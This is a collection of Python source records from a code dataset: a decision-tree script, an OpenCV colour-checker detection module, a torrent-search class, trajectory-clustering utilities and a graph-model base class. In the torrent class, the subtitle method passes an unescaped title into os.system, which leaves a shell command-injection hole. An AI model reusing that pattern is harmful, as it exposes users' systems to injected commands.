cuantitativas\n\n# split dataset en train (70%) y test (30%)\nX = dfOHEncoded.iloc[:,0:110]\ny = dfOHEncoded['resultadoFinal_BIEN']\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=1)\n\n# Entrenar decision tree usando entropia y profundidad maxima 6\nclf = DecisionTreeClassifier(criterion=\"entropy\",max_depth=4)\nclf = clf.fit(X_train,y_train)\n\n# Predecir con datos de test\ny_pred = clf.predict(X_test)\nprint('-----------------------------------------------------------------------------------------')\n# Accuracy: (tp+tn)/n - donde n es la cantidad de FP+FN+TP+TN\nprint(\"Accuracy - Acertividad y Ecxactitud de las muestras:\",metrics.accuracy_score(y_test, y_pred))\nprint(metrics.precision_recall_fscore_support(y_test, y_pred, average=None))\nprint('-----------------------------------------------------------------------------------------')\nprint (\n 'Se entreno el modelo con 20% de datos 0.2 en el test_size'\n ' usando entropia con max de profundiad de 4'\n ' ,con una media de 0.88 % ( entre presicion y recall)'\n )\nprint('----------------------------')\nprint('Calcular matriz de confusion')\nprint('----------------------------')\n#metrics.confusion_matrix(y_test, y_pred)\nprint(pd.crosstab(y_test, y_pred, \n rownames=['actual'], \n colnames=['pred'], margins=False, margins_name=\"Total\")\n)\n\n# Obtener importancia de variables y vertificar variables mas relevantes\nprint('----------------------------')\nprint('Importancia de Variables')\nprint('Variables mas relevantes')\nprint('----------------------------')\nfi = pd.DataFrame(zip(X.columns,clf.feature_importances_), columns=['feature','importance'])\nprint(fi[fi['importance'] > 0.0].sort_values(by=['importance'], ascending=False))\n\n\n\n# cargar exportador de grafos y funcion de llamada a sistema\nexport_graphviz(clf, out_file=\"creditos.dot\", \n filled=True, rounded=True,\n special_characters=True, feature_names = X.columns,class_names = ['0','1'])\n\n(graph,) = pydot.graph_from_dot_file('creditos.dot')\ngraph.write_png('creditos.png')\n","sub_path":"arbol-ohencode-jp.py","file_name":"arbol-ohencode-jp.py","file_ext":"py","file_size_in_byte":3626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"96856227","text":"# -*- coding: utf-8 -*-\n\"\"\"\nColour Checker Detection - Segmentation\n=======================================\n\nDefines objects for colour checker detection using segmentation:\n\n- :func:`colour_checkers_coordinates_segmentation`\n- :func:`extract_colour_checkers_segmentation`\n- :func:`detect_colour_checkers_segmentation`\n\nReferences\n----------\n- :cite:`Abecassis2011` : Abecassis, F. (2011). OpenCV - Rotation\n (Deskewing). Retrieved October 27, 2018, from http://felix.abecassis.me/\\\n2011/10/opencv-rotation-deskewing/\n\"\"\"\n\nfrom __future__ import division, unicode_literals\n\nimport cv2\nimport numpy as np\nfrom collections import namedtuple\n\nfrom colour.models import cctf_decoding, cctf_encoding\nfrom colour.utilities import as_float_array, as_int_array, as_int\n\n__author__ = 'Colour Developers'\n__copyright__ = 'Copyright (C) 2018-2020 - Colour Developers'\n__license__ = 'New BSD License - https://opensource.org/licenses/BSD-3-Clause'\n__maintainer__ = 'Colour Developers'\n__email__ = 'colour-developers@colour-science.org'\n__status__ = 'Production'\n\n__all__ = [\n 'ASPECT_RATIO', 'SWATCHES_HORIZONTAL', 'SWATCHES_VERTICAL', 'SWATCHES',\n 'SWATCH_MINIMUM_AREA_FACTOR', 'WORKING_WIDTH',\n 'ColourCheckersDetectionData', 'ColourCheckerSwatchesData', 'swatch_masks',\n 'as_8_bit_BGR_image', 'adjust_image', 'is_square', 'contour_centroid',\n 'scale_contour', 'crop_and_level_image_with_rectangle',\n 'colour_checkers_coordinates_segmentation',\n 'extract_colour_checkers_segmentation',\n 'detect_colour_checkers_segmentation'\n]\n\nASPECT_RATIO = 1.5\n\"\"\"\nColour checker aspect ratio.\n\nASPECT_RATIO : numeric\n\"\"\"\n\nSWATCHES_HORIZONTAL = 6\n\"\"\"\nColour checker horizontal swatches count.\n\nSWATCHES_HORIZONTAL : int\n\"\"\"\n\nSWATCHES_VERTICAL = 4\n\"\"\"\nColour checker vertical swatches count.\n\nSWATCHES_VERTICAL : int\n\"\"\"\n\nSWATCHES = SWATCHES_HORIZONTAL * SWATCHES_VERTICAL\n\"\"\"\nColour checker total swatches count.\n\nSWATCHES : int\n\"\"\"\n\nSWATCH_MINIMUM_AREA_FACTOR = 200\n\"\"\"\nSwatch minimum area factor :math:`f` with the minimum area :math:`m_a`\nexpressed as follows: :math:`m_a = image_w * image_h / s_c / f` where\n:math:`image_w`, :math:`image_h` and :math:`s_c` are respectively the image\nwidth, height and the swatches count.\n\nSWATCH_MINIMUM_AREA_FACTOR : numeric\n\"\"\"\n\nWORKING_WIDTH = 1440\n\"\"\"\nWidth processed images are resized to.\n\nWORKING_WIDTH : int\n\"\"\"\n\n\nclass ColourCheckersDetectionData(\n namedtuple(\n 'ColourCheckersDetectionData',\n ('colour_checkers', 'clusters', 'swatches', 'segmented_image'))):\n \"\"\"\n Colour checkers detection data used for plotting, debugging and further\n analysis.\n\n Parameters\n ----------\n colour_checkers : array_like\n Colour checker bounding boxes, i.e., the. clusters that have the\n relevant count of swatches.\n clusters : array_like\n Detected swatches clusters.\n swatches : array_like\n Detected swatches.\n segmented_image : numeric or array_like\n Thresholded/Segmented image.\n \"\"\"\n\n\nclass ColourCheckerSwatchesData(\n namedtuple(\n 'ColourCheckerSwatchesData',\n ('swatch_colours', 'colour_checker_image', 'swatch_masks'))):\n \"\"\"\n Colour checker swatches data used for plotting, debugging and further\n analysis.\n\n Parameters\n ----------\n swatch_colours : array_like\n Colour checker swatches colours.\n colour_checker_image : array_like\n Cropped and levelled Colour checker image.\n swatch_masks : array_like\n Colour checker swatches masks.\n \"\"\"\n\n\ndef swatch_masks(width, height, swatches_h, swatches_v, samples):\n \"\"\"\n Returns swatch masks for given image width and height and swatches count.\n\n Parameters\n ----------\n width : int\n Image width.\n height : height\n Image height.\n swatches_h : int\n Horizontal swatches count.\n swatches_v : int\n Vertical swatches count.\n samples : int\n Samples count.\n\n Returns\n -------\n list\n List of swatch masks.\n\n Examples\n --------\n >>> from pprint import pprint\n >>> pprint(swatch_masks(16, 8, 4, 2, 1)) # doctest: +ELLIPSIS\n [array([2, 2, 2, 2]...),\n array([2, 2, 6, 6]...),\n array([ 2, 2, 10, 10]...),\n array([ 2, 2, 14, 14]...),\n array([6, 6, 2, 2]...),\n array([6, 6, 6, 6]...),\n array([ 6, 6, 10, 10]...),\n array([ 6, 6, 14, 14]...)]\n \"\"\"\n\n samples = as_int(samples / 2)\n\n masks = []\n offset_h = width / swatches_h / 2\n offset_v = height / swatches_v / 2\n for j in np.linspace(offset_v, height - offset_v, swatches_v):\n for i in np.linspace(offset_h, width - offset_h, swatches_h):\n masks.append(\n as_int_array(\n [j - samples, j + samples, i - samples, i + samples]))\n\n return masks\n\n\ndef as_8_bit_BGR_image(image):\n \"\"\"\n Converts and encodes given linear float *RGB* image to 8-bit *BGR* with\n *sRGB* reverse OETF.\n\n Parameters\n ----------\n image : array_like\n Image to convert.\n\n Returns\n -------\n ndarray\n Converted image.\n\n Notes\n -----\n - In the eventuality where the image is already an integer array, the\n conversion is by-passed.\n\n Examples\n --------\n >>> from colour.algebra import random_triplet_generator\n >>> prng = np.random.RandomState(4)\n >>> image = list(random_triplet_generator(8, random_state=prng))\n >>> image = np.reshape(image, [4, 2, 3])\n >>> print(image)\n [[[ 0.96702984 0.25298236 0.0089861 ]\n [ 0.54723225 0.43479153 0.38657128]]\n \n [[ 0.97268436 0.77938292 0.04416006]\n [ 0.71481599 0.19768507 0.95665297]]\n \n [[ 0.69772882 0.86299324 0.43614665]\n [ 0.2160895 0.98340068 0.94897731]]\n \n [[ 0.97627445 0.16384224 0.78630599]\n [ 0.00623026 0.59733394 0.8662893 ]]]\n >>> image = as_8_bit_BGR_image(image)\n >>> print(image)\n [[[ 23 137 251]\n [167 176 195]]\n \n [[ 59 228 251]\n [250 122 219]]\n \n [[176 238 217]\n [249 253 128]]\n \n [[229 112 252]\n [239 203 18]]]\n >>> as_8_bit_BGR_image(image)\n array([[[ 23, 137, 251],\n [167, 176, 195]],\n \n [[ 59, 228, 251],\n [250, 122, 219]],\n \n [[176, 238, 217],\n [249, 253, 128]],\n \n [[229, 112, 252],\n [239, 203, 18]]], dtype=uint8)\n \"\"\"\n\n image = np.asarray(image)\n\n if image.dtype == np.uint8:\n return image\n\n return cv2.cvtColor((cctf_encoding(image) * 255).astype(np.uint8),\n cv2.COLOR_RGB2BGR)\n\n\ndef adjust_image(image, target_width=WORKING_WIDTH):\n \"\"\"\n Adjusts given image so that it is horizontal and resizes it to given target\n width.\n\n Parameters\n ----------\n image : array_like\n Image to adjust.\n target_width : int, optional\n Width the image is resized to.\n\n Returns\n -------\n ndarray\n Resized image.\n\n Examples\n --------\n >>> from colour.algebra import random_triplet_generator\n >>> prng = np.random.RandomState(4)\n >>> image = list(random_triplet_generator(8, random_state=prng))\n >>> image = np.reshape(image, [2, 4, 3])\n >>> adjust_image(image, 5) # doctest: +ELLIPSIS\n array([[[ 0.9925326..., 0.2419374..., -0.0139522...],\n [ 0.6174496..., 0.3460755..., 0.3189758...],\n [ 0.7447774..., 0.6786660..., 0.1652180...],\n [ 0.9476451..., 0.6550805..., 0.2609945...],\n [ 0.6991505..., 0.1623470..., 1.0120867...]],\n \n [[ 0.7269885..., 0.8556784..., 0.4049920...],\n [ 0.2666564..., 1.0401633..., 0.8238320...],\n [ 0.6419699..., 0.5442698..., 0.9082210...],\n [ 0.7894426..., 0.1944301..., 0.7906868...],\n [-0.0526997..., 0.6236684..., 0.8711482...]]])\n \"\"\"\n\n width, height = image.shape[1], image.shape[0]\n if width < height:\n image = cv2.rotate(image, cv2.ROTATE_90_CLOCKWISE)\n height, width = width, height\n\n ratio = width / target_width\n\n if np.allclose(ratio, 1):\n return image\n else:\n return cv2.resize(\n image, (as_int(target_width), as_int(height / ratio)),\n interpolation=cv2.INTER_CUBIC)\n\n\ndef is_square(contour, tolerance=0.015):\n \"\"\"\n Returns if given contour is a square.\n\n Parameters\n ----------\n contour : array_like\n Shape to test whether it is a square.\n tolerance : numeric, optional\n Tolerance under which the contour is considered to be a square.\n\n Returns\n -------\n bool\n Whether given contour is a square.\n\n Examples\n --------\n >>> shape = np.array([[0, 0], [1, 0], [1, 1], [0, 1]])\n >>> is_square(shape)\n True\n >>> shape = np.array([[0.5, 0], [1, 0], [1, 1], [0, 1]])\n >>> is_square(shape)\n False\n \"\"\"\n\n return cv2.matchShapes(contour, np.array([[0, 0], [1, 0], [1, 1], [0, 1]]),\n cv2.CONTOURS_MATCH_I2, 0.0) < tolerance\n\n\ndef contour_centroid(contour):\n \"\"\"\n Returns the centroid of given contour.\n\n Parameters\n ----------\n contour : array_like\n Contour to return the centroid of.\n\n Returns\n -------\n tuple\n Contour centroid.\n\n Notes\n -----\n - A :class:`tuple` class is returned instead of a :class:`ndarray` class\n for convenience with *OpenCV*.\n\n Examples\n --------\n >>> contour = np.array([[0, 0], [1, 0], [1, 1], [0, 1]])\n >>> contour_centroid(contour)\n (0.5, 0.5)\n \"\"\"\n\n moments = cv2.moments(contour)\n centroid = np.array(\n [moments['m10'] / moments['m00'], moments['m01'] / moments['m00']])\n\n return centroid[0], centroid[1]\n\n\ndef scale_contour(contour, factor):\n \"\"\"\n Scales given contour by given scale factor.\n\n Parameters\n ----------\n contour : array_like\n Contour to scale.\n factor : numeric\n Scale factor.\n\n Returns\n -------\n ndarray\n Scaled contour.\n\n Examples\n --------\n >>> contour = np.array([[0, 0], [1, 0], [1, 1], [0, 1]])\n >>> scale_contour(contour, 2)\n array([[ 0., 0.],\n [ 2., 0.],\n [ 2., 2.],\n [ 0., 2.]])\n \"\"\"\n\n centroid = as_int_array(contour_centroid(contour))\n scaled_contour = (as_float_array(contour) - centroid) * factor + centroid\n\n return scaled_contour\n\n\ndef crop_and_level_image_with_rectangle(image, rectangle):\n \"\"\"\n Crops and rotates/levels given image using given rectangle.\n\n Parameters\n ----------\n image : array_like\n Image to crop and rotate/level.\n rectangle : tuple\n Rectangle used to crop and rotate/level the image.\n\n Returns\n -------\n ndarray\n Cropped and rotated/levelled image.\n\n References\n ----------\n :cite:`Abecassis2011`\n\n Notes\n -----\n - ``image`` is expected to be an unsigned 8-bit sRGB encoded image.\n\n Examples\n --------\n >>> import os\n >>> from colour import read_image\n >>> from colour_checker_detection import TESTS_RESOURCES_DIRECTORY\n >>> path = os.path.join(TESTS_RESOURCES_DIRECTORY,\n ... 'colour_checker_detection', 'detection',\n ... 'IMG_1967.png')\n >>> image = as_8_bit_BGR_image(adjust_image(read_image(path)))\n >>> rectangle = (\n ... (723.29608154, 465.50939941),\n ... (461.24377441, 696.34759522),\n ... -88.18692780,\n ... )\n >>> print(image.shape)\n (958, 1440, 3)\n >>> image = crop_and_level_image_with_rectangle(image, rectangle)\n >>> print(image.shape)\n (461, 696, 3)\n \"\"\"\n\n width, height = image.shape[1], image.shape[0]\n width_r, height_r = rectangle[1]\n centroid = as_int_array(contour_centroid(cv2.boxPoints(rectangle)))\n centroid = centroid[0], centroid[1]\n angle = rectangle[-1]\n\n if angle < -45:\n angle += 90\n width_r, height_r = height_r, width_r\n\n width_r, height_r = as_int_array([width_r, height_r])\n\n M_r = cv2.getRotationMatrix2D(centroid, angle, 1)\n\n image_r = cv2.warpAffine(image, M_r, (width, height), cv2.INTER_CUBIC)\n image_c = cv2.getRectSubPix(image_r, (width_r, height_r),\n (centroid[0], centroid[1]))\n\n return image_c\n\n\ndef colour_checkers_coordinates_segmentation(image, additional_data=False):\n \"\"\"\n Detects the colour checkers coordinates in given image :math:`image` using\n segmentation.\n\n This is the core detection definition. The process is a follows:\n\n - Input image :math:`image` is converted to a grayscale image\n :math:`image_g`.\n - Image :math:`image_g` is denoised.\n - Image :math:`image_g` is thresholded/segmented to image\n :math:`image_s`.\n - Image :math:`image_s` is eroded and dilated to cleanup remaining noise.\n - Contours are detected on image :math:`image_s`.\n - Contours are filtered to only keep squares/swatches above and below\n defined surface area.\n - Squares/swatches are clustered to isolate region-of-interest that are\n potentially colour checkers: Contours are scaled by a third so that\n colour checkers swatches are expected to be joined, creating a large\n rectangular cluster. Rectangles are fitted to the clusters.\n - Clusters with an aspect ratio different to the expected one are\n rejected, a side-effect is that the complementary pane of the\n *X-Rite* *ColorChecker Passport* is omitted.\n - Clusters with a number of swatches close to :attr:`SWATCHES` are\n kept.\n\n Parameters\n ----------\n image : array_like\n Image to detect the colour checkers in.\n additional_data : bool, optional\n Whether to output additional data.\n\n Returns\n -------\n list or ColourCheckersDetectionData\n List of colour checkers coordinates or\n :class:`ColourCheckersDetectionData` class instance with additional\n data.\n\n Notes\n -----\n - Multiple colour checkers can be detected if presented in ``image``.\n\n Examples\n --------\n >>> import os\n >>> from colour import read_image\n >>> from colour_checker_detection import TESTS_RESOURCES_DIRECTORY\n >>> path = os.path.join(TESTS_RESOURCES_DIRECTORY,\n ... 'colour_checker_detection', 'detection',\n ... 'IMG_1967.png')\n >>> image = read_image(path)\n >>> colour_checkers_coordinates_segmentation(image) # doctest: +ELLIPSIS\n [array([[1065, 707],\n [ 369, 688],\n [ 382, 226],\n [1078, 246]]...)]\n \"\"\"\n\n image = as_8_bit_BGR_image(adjust_image(image, WORKING_WIDTH))\n\n width, height = image.shape[1], image.shape[0]\n maximum_area = width * height / SWATCHES\n minimum_area = width * height / SWATCHES / SWATCH_MINIMUM_AREA_FACTOR\n\n block_size = as_int(WORKING_WIDTH * 0.015)\n block_size = block_size - block_size % 2 + 1\n\n # Thresholding/Segmentation.\n image_g = cv2.cvtColor(image, cv2.COLOR_RGB2GRAY)\n image_g = cv2.fastNlMeansDenoising(image_g, None, 10, 7, 21)\n image_s = cv2.adaptiveThreshold(image_g, 255, cv2.ADAPTIVE_THRESH_MEAN_C,\n cv2.THRESH_BINARY, block_size, 3)\n # Cleanup.\n kernel = np.ones((3, 3), np.uint8)\n image_c = cv2.erode(image_s, kernel, iterations=1)\n image_c = cv2.dilate(image_c, kernel, iterations=1)\n\n # Detecting contours.\n contours, _hierarchy = cv2.findContours(image_c, cv2.RETR_TREE,\n cv2.CHAIN_APPROX_NONE)\n\n # Filtering squares/swatches contours.\n swatches = []\n for contour in contours:\n curve = cv2.approxPolyDP(contour, 0.01 * cv2.arcLength(contour, True),\n True)\n if minimum_area < cv2.contourArea(curve) < maximum_area and is_square(\n curve):\n swatches.append(\n as_int_array(cv2.boxPoints(cv2.minAreaRect(curve))))\n\n # Clustering squares/swatches.\n clusters = np.zeros(image.shape, dtype=np.uint8)\n for swatch in [\n as_int_array(scale_contour(swatch, 1 + 1 / 3))\n for swatch in swatches\n ]:\n cv2.drawContours(clusters, [swatch], -1, [255] * 3, -1)\n clusters = cv2.cvtColor(clusters, cv2.COLOR_RGB2GRAY)\n clusters, _hierarchy = cv2.findContours(clusters, cv2.RETR_EXTERNAL,\n cv2.CHAIN_APPROX_NONE)\n clusters = [\n as_int_array(\n scale_contour(cv2.boxPoints(cv2.minAreaRect(cluster)), 0.975))\n for cluster in clusters\n ]\n\n # Filtering clusters using their aspect ratio.\n filtered_clusters = []\n for cluster in clusters[:]:\n rectangle = cv2.minAreaRect(cluster)\n width = max(rectangle[1][0], rectangle[1][1])\n height = min(rectangle[1][0], rectangle[1][1])\n ratio = width / height\n if ASPECT_RATIO * 0.9 < ratio < ASPECT_RATIO * 1.1:\n filtered_clusters.append(cluster)\n clusters = filtered_clusters\n\n # Filtering swatches within cluster.\n counts = []\n for cluster in clusters:\n count = 0\n for swatch in swatches:\n if cv2.pointPolygonTest(cluster, contour_centroid(swatch),\n False) == 1:\n count += 1\n counts.append(count)\n counts = np.array(counts)\n indexes = np.where(\n np.logical_and(counts >= SWATCHES * 0.75,\n counts <= SWATCHES * 1.25))[0].tolist()\n\n colour_checkers = [clusters[i] for i in indexes]\n\n if additional_data:\n return ColourCheckersDetectionData(colour_checkers, clusters, swatches,\n image_c)\n else:\n return colour_checkers\n\n\ndef extract_colour_checkers_segmentation(image):\n \"\"\"\n Extracts the colour checkers sub-images in given image using segmentation.\n\n Parameters\n ----------\n image : array_like\n Image to extract the colours checkers sub-images from.\n\n Returns\n -------\n list\n List of colour checkers sub-images.\n\n Examples\n --------\n >>> import os\n >>> from colour import read_image\n >>> from colour_checker_detection import TESTS_RESOURCES_DIRECTORY\n >>> path = os.path.join(TESTS_RESOURCES_DIRECTORY,\n ... 'colour_checker_detection', 'detection',\n ... 'IMG_1967.png')\n >>> image = read_image(path)\n >>> extract_colour_checkers_segmentation(image)\n ... # doctest: +SKIP\n [array([[[ 86, 104, 113],\n [ 89, 102, 118],\n [ 88, 101, 117],\n ...,\n [ 79, 101, 114],\n [ 76, 101, 114],\n [ 79, 98, 110]],\n \n [[ 84, 104, 112],\n [ 85, 102, 115],\n [ 84, 101, 115],\n ...,\n [ 80, 101, 110],\n [ 79, 101, 112],\n [ 78, 98, 112]],\n \n [[ 84, 102, 112],\n [ 82, 102, 112],\n [ 82, 101, 113],\n ...,\n [ 81, 100, 109],\n [ 80, 100, 110],\n [ 79, 100, 113]],\n \n ...,\n [[ 89, 105, 117],\n [ 90, 106, 120],\n [ 86, 106, 117],\n ...,\n [ 84, 100, 109],\n [ 83, 100, 111],\n [ 80, 100, 114]],\n \n [[ 89, 106, 116],\n [ 91, 107, 121],\n [ 89, 106, 119],\n ...,\n [ 81, 99, 113],\n [ 79, 100, 115],\n [ 75, 100, 114]],\n \n [[ 84, 108, 117],\n [ 89, 108, 117],\n [ 91, 107, 117],\n ...,\n [ 79, 98, 117],\n [ 77, 100, 117],\n [ 73, 101, 116]]], dtype=uint8)]\n \"\"\"\n\n image = as_8_bit_BGR_image(adjust_image(image, WORKING_WIDTH))\n\n colour_checkers = []\n for colour_checker in colour_checkers_coordinates_segmentation(image):\n colour_checker = crop_and_level_image_with_rectangle(\n image, cv2.minAreaRect(colour_checker))\n width, height = (colour_checker.shape[1], colour_checker.shape[0])\n\n if width < height:\n colour_checker = cv2.rotate(colour_checker,\n cv2.ROTATE_90_CLOCKWISE)\n\n colour_checkers.append(colour_checker)\n\n return colour_checkers\n\n\ndef detect_colour_checkers_segmentation(image,\n samples=16,\n additional_data=False):\n \"\"\"\n Detects the colour checkers swatches in given image using segmentation.\n\n Parameters\n ----------\n image : array_like\n Image to detect the colour checkers swatches in.\n samples : int\n Samples count to use to compute the swatches colours. The effective\n samples count is :math:`samples^2`.\n additional_data : bool, optional\n Whether to output additional data.\n\n Returns\n -------\n list\n List of colour checkers swatches or :class:`ColourCheckerSwatchesData`\n class instances.\n\n Examples\n --------\n >>> import os\n >>> from colour import read_image\n >>> from colour_checker_detection import TESTS_RESOURCES_DIRECTORY\n >>> path = os.path.join(TESTS_RESOURCES_DIRECTORY,\n ... 'colour_checker_detection', 'detection',\n ... 'IMG_1967.png')\n >>> image = read_image(path)\n >>> detect_colour_checkers_segmentation(image) # doctest: +ELLIPSIS\n [array([[ 0.3594894..., 0.2225419..., 0.1176996...],\n [ 0.6250058..., 0.3931947..., 0.2417636...],\n [ 0.3304194..., 0.3142103..., 0.2874383...],\n [ 0.3034269..., 0.2721812..., 0.1053537...],\n [ 0.4153488..., 0.3183605..., 0.3067842...],\n [ 0.3458465..., 0.4393400..., 0.2912665...],\n [ 0.6782215..., 0.3519573..., 0.0752686...],\n [ 0.2715231..., 0.2515535..., 0.3295411...],\n [ 0.6171124..., 0.2687208..., 0.1852935...],\n [ 0.3049796..., 0.1792275..., 0.1908085...],\n [ 0.4844366..., 0.4576518..., 0.0392559...],\n [ 0.6494152..., 0.3991223..., 0.0329260...],\n [ 0.1922949..., 0.1842026..., 0.2731065...],\n [ 0.2780555..., 0.3836590..., 0.1233134...],\n [ 0.5515815..., 0.2126631..., 0.1250530...],\n [ 0.7178619..., 0.5132913..., 0.0804213...],\n [ 0.5753956..., 0.2563947..., 0.2672106...],\n [ 0.1799058..., 0.3160584..., 0.2945296...],\n [ 0.7402078..., 0.6088296..., 0.4374975...],\n [ 0.6272391..., 0.5156084..., 0.3713541...],\n [ 0.5120363..., 0.4196305..., 0.2976295...],\n [ 0.3690167..., 0.3019190..., 0.2083050...],\n [ 0.2624792..., 0.2143349..., 0.1428991...],\n [ 0.1625438..., 0.1333312..., 0.0807412...]])]\n \"\"\"\n\n image = adjust_image(image, WORKING_WIDTH)\n\n swatches_h, swatches_v = SWATCHES_HORIZONTAL, SWATCHES_VERTICAL\n\n colour_checkers_colours = []\n colour_checkers_data = []\n for colour_checker in extract_colour_checkers_segmentation(image):\n colour_checker = cctf_decoding(\n as_float_array(colour_checker[..., ::-1]) / 255)\n width, height = (colour_checker.shape[1], colour_checker.shape[0])\n masks = swatch_masks(width, height, swatches_h, swatches_v, samples)\n\n swatch_colours = []\n for i, mask in enumerate(masks):\n swatch_colours.append(\n np.mean(\n colour_checker[mask[0]:mask[1], mask[2]:mask[3], ...],\n axis=(0, 1)))\n\n # Colour checker could be in reverse order.\n swatch_neutral_colours = swatch_colours[18:23]\n is_reversed = False\n for i, swatch, in enumerate(swatch_neutral_colours[:-1]):\n if np.mean(swatch) < np.mean(swatch_neutral_colours[i + 1]):\n is_reversed = True\n break\n\n if is_reversed:\n swatch_colours = swatch_colours[::-1]\n\n swatch_colours = np.asarray(swatch_colours)\n\n colour_checkers_colours.append(swatch_colours)\n colour_checkers_data.append((colour_checker, masks))\n\n if additional_data:\n return [\n ColourCheckerSwatchesData(colour_checkers_colours[i],\n *colour_checkers_data[i])\n for i, colour_checker_colours in enumerate(colour_checkers_colours)\n ]\n else:\n return colour_checkers_colours\n","sub_path":"colour_checker_detection/detection/segmentation.py","file_name":"segmentation.py","file_ext":"py","file_size_in_byte":24710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"220461928","text":"from .extractors import eztv, yts\nimport os\nfrom halo import Halo\n\n\nclass Ezflix(object):\n def __init__(self,\n query,\n media_type='tv',\n limit=20,\n sort_by='seeds',\n sort_order='desc',\n quality=None,\n minimum_rating=None,\n language='en'\n ):\n self._torrents = []\n self._query = query\n self._media_type = media_type\n self._limit = limit\n self._sort_by = sort_by\n self._sort_order = sort_order\n self._quality = quality\n self._minimum_rating = minimum_rating\n self._language = language\n\n def get_magnet(self, val):\n for result in self._torrents:\n if result['id'] == int(val):\n return result\n return None\n\n def find_subtitles(self, title):\n os.system(\"subliminal download -l %s '%s'\" % (self._language, title))\n cur_dir = os.getcwd()\n file_list = os.listdir(cur_dir)\n for f in file_list:\n if title in f:\n return f\n\n return None\n\n def get_torrents(self):\n spinner = Halo(text='Searching...', spinner='dots')\n spinner.start()\n if self._media_type == 'tv':\n self._torrents = eztv(self._query.replace(' ', '-').lower(), limit=self._limit, quality=self._quality)\n\n elif self._media_type == 'movie':\n self._torrents = yts(query_term=self._query,\n limit=self._limit,\n sort_by=self._sort_by,\n sort_order=self._sort_order,\n quality=self._quality,\n minimum_rating=self._minimum_rating\n )\n spinner.stop()\n spinner.clear()\n return self._torrents\n","sub_path":"ezflix/ezflix.py","file_name":"ezflix.py","file_ext":"py","file_size_in_byte":1912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"445927841","text":"import math\n\nimport pandas as pd\nfrom sklearn.preprocessing import MinMaxScaler\nfrom traffic.core import Traffic\n\nfrom .clustering import DCEC\n\n\ndef input_shape(nb_samples, nb_features):\n height = [\n d for d in range(2, int(math.sqrt(nb_samples)) + 1) if nb_samples % d == 0\n ][-1]\n width = nb_samples // height\n return (width, height, nb_features)\n\n\ndef input_shape1d(nb_samples, nb_features):\n return (1, nb_samples, nb_features)\n\ndef input_shape_local1d(nb_samples, nb_features):\n return (1,nb_samples, nb_features)\n\ndef input_shape_dense(nb_samples, nb_features):\n return (nb_samples* nb_features,)\n\n\ndef pretrained_clust(\n traffic_file, list_features, filters, n_clusters, pretrained_path, to_pickle,\n):\n t = Traffic.from_file(traffic_file)\n nb_samples = len(t[0])\n nb_features = len(list_features)\n\n dcec = DCEC(\n input_shape=input_shape(nb_samples, nb_features),\n filters=filters,\n n_clusters=n_clusters,\n )\n dcec.load_weights(pretrained_path)\n\n t_c = t.clustering(\n nb_samples=None,\n features=list_features,\n clustering=dcec,\n transform=MinMaxScaler(feature_range=(-1, 1)),\n ).predict()\n\n re = dcec.score_samples(dcec.X)\n re = MinMaxScaler(feature_range=(0, 1)).fit_transform(re.reshape(-1, 1)).flatten()\n t_c_re = pd.DataFrame.from_records(\n [dict(flight_id=f.flight_id, re=re) for f, re in zip(t_c, re)]\n )\n t_c_re = t_c.merge(t_c_re, on=\"flight_id\")\n\n t_c_re.to_pickle(to_pickle)\n print(\n t_c_re.groupby([\"cluster\"]).agg(\n {\"flight_id\": \"nunique\", \"re\": [\"mean\", \"min\", \"max\"]}\n )\n )\n return dcec, t_c_re\n","sub_path":"dcec/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"503283832","text":"import os\r\nimport random\r\nimport logging\r\nimport torch\r\n\r\nimport numpy as np\r\nimport tensorflow as tf\r\nimport os.path as osp\r\nimport scipy.sparse as sp\r\n\r\nfrom tensorflow.keras import backend as K\r\n\r\nfrom abc import ABC\r\n\r\nfrom graphgallery import intx, floatx, backend, set_backend, is_list_like\r\nfrom graphgallery.data.io import makedirs_from_path\r\nfrom graphgallery.data import Basegraph, Graph\r\nfrom graphgallery.utils.raise_error import raise_if_kwargs\r\nfrom graphgallery.utils import save\r\n\r\n\r\ndef _check_cur_module(module, kind):\r\n modules = module.split('.')[-4:]\r\n if any((\"TF\" in modules and kind == \"P\",\r\n \"PTH\" in modules and kind == \"T\")):\r\n cur_module = \"Tensorflow models\" if kind == \"P\" else \"PyTorch models\"\r\n raise RuntimeError(f\"You are currently using models in '{cur_module}' but with backend '{backend()}'.\"\r\n \"Please use `set_backend()` to change the current backend.\")\r\n\r\n\r\ndef parse_graph_inputs(*graph):\r\n # TODO: Maybe I could write it a little more elegantly here?\r\n if len(graph) == 0:\r\n graph = None\r\n elif len(graph) == 1:\r\n graph, = graph\r\n if isinstance(graph, Basegraph):\r\n ...\r\n elif sp.isspmatrix(graph):\r\n graph = Graph(graph)\r\n elif isinstance(graph, dict):\r\n return Graph(**graph)\r\n elif is_list_like(graph):\r\n # TODO: multi graph\r\n ...\r\n else:\r\n raise ValueError(f\"Unrecognized inputs {graph}.\")\r\n else:\r\n if sp.isspmatrix(graph[0]):\r\n graph = Graph(*graph)\r\n elif is_list_like(graph[0]):\r\n # TODO: multi graph\r\n ...\r\n else:\r\n raise ValueError(f\"Unrecognized inputs {graph}.\")\r\n\r\n return graph\r\n\r\n\r\ndef parse_device(device: str, kind: str) -> str:\r\n # TODO:\r\n # 1. device can be torch.device\r\n # 2. check if gpu is available\r\n _device = osp.split(device.lower())[1]\r\n if not any((_device.startswith(\"cpu\"),\r\n _device.startswith(\"cuda\"),\r\n _device.startswith(\"gpu\"))):\r\n raise RuntimeError(\r\n f\" Expected one of cpu (CPU), cuda (CUDA), gpu (GPU) device type at start of device string: {device}\")\r\n\r\n if _device.startswith(\"cuda\"):\r\n if kind == \"T\":\r\n _device = \"GPU\" + _device[4:]\r\n elif _device.startswith(\"gpu\"):\r\n if kind == \"P\":\r\n _device = \"cuda\" + _device[3:]\r\n\r\n if kind == \"P\":\r\n if _device.startswith('cuda'):\r\n torch.cuda.empty_cache()\r\n return torch.device(_device)\r\n return _device\r\n\r\n\r\nclass BaseModel(ABC):\r\n \"\"\"Base model for semi-supervised learning and unsupervised learning.\"\"\"\r\n\r\n def __init__(self, *graph, device=\"cpu:0\", seed=None, name=None, **kwargs):\r\n \"\"\"Creat an Base model for 